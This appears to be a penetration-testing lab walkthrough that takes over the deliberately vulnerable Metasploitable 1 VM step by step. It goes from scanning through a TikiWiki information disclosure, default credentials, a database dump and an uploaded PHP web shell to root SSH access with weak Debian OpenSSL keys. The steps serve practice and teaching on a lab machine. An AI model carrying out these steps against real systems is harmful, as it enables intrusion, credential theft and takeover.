#HackOnTuesday Episode 1 Metasploitable 1 – TikiWiki

Metasploitable is a vulnerable VM created to practice common penetration testing techniques. In this episode of #HackOnTuesday, Gianni shows how to discover hidden directories and files on a webserver, how to exploit an information disclosure in TikiWiki 1.9.5 and get critical information about the database, how to find misconfigurations in the system, and last but not least how to retrieve a private SSH key and get root access on the Metasploitable VM.

Tools, Scripts, and Exploits

The tools,scripts, and exploits used in this episode of #HackOnTuesday are:

» nmap (https://nmap.org/)
» DirBuster (https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
» TikiWiki 1.9.5 Sirius – (sort_mode) Information Disclosure (https://www.exploit-db.com/exploits/2701/)
» b374k (https://github.com/b374k/b374k)
» SSH 2048-bit RSA Keys X86 (https://hdm.io/tools/debian-openssl/)
» Lynis (https://cisofy.com/lynis/)

Steps

» Fire up the Metasploitable 1 virtual machine.
» Get the IP address of the Metasploitable 1 VM
   • /sbin/ifconfig # Get the IP of your machine
   • nmap -sn 192.168.75.0/24 # Scan the network
» Open a terminal on your machine and scan the VM
   • nmap -v -Pn -sT 192.168.75.149 -p1-65535 -oX meta.xml
» Open a new terminal and run DirBuster
   • java -jar DirBuster-0.12.jar
» Analyze the output of DirBuster and open tikiwiki/ on the browser
» Look for the version of TikiWiki
» Search for an exploit or vulnerability on CVE Details and Exploit DB.
» Select the TikiWiki 1.9.5 Sirius – (sort_mode) Information Disclosure advisory.
» Open the first URL from the advisory in your browser and search for the term “database”.
   • http://192.168.75.149/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
» Use the credentials found in the previous step to connect to the MySQL database
   • mysql -h 192.168.75.149 -u root -p
   • Type “root” as password.
» Inspect the database for sensitive information.
   • SHOW DATABASES;
   • USE tikiwiki195;
   • SHOW TABLES;
   • SHOW COLUMNS FROM tiki_users;
   • SELECT * FROM tiki_users;
   • SELECT * FROM users_users;
» Log into the TikiWiki Dashboard using the credentials found (admin/admin)
» Look around for interesting places to upload a shell.
   • http://192.168.75.149/tikiwiki/tiki-backup.php
» Create a PHP shell.
   • php -f index.php — -o shell.php -p password -s -b -z gzcompress -c 9
» Upload shell.php and go to /tikiwiki/backups/shell.php
» Get some information about the system.
   • uname -a
   • whoami
» Upload Lynis package via tiki-backup.php
» Extract and run lynis on the VM
   • tar xvf lynis-2.3.4.tar.gz
   • cd lynis
   • ls -l
   • ./lynis audit system
   • Find the “File Permissions” section or look for “.ssh”
» Look for accessible .ssh folders in the VM
   • find / -name “.ssh” -type d | grep -v “Permission denied”
   • ls -l /root/.ssh
» Exfiltrate authorized_keys file.
   • cat /root/.ssh/authorized_keys
» Get the private key to access the SSH service
   • tar xvf debian_ssh_rsa_2048_x86.tar.bz2
   • grep -r -l “AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6s” rsa/
   • chmod 600 rsa/2048/57c3115d77c56390332dc5c49978627a-5429
   • ssh -i rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.75.149
» Game over!!

NOTE: Older versions of Debian and Ubuntu were shipped with an Openssl version that had a bug in the random number generator causing the library to generate SSH keys using only the PID of the process. Learn more about this vulnerability, here: https://hdm.io/tools/debian-openssl.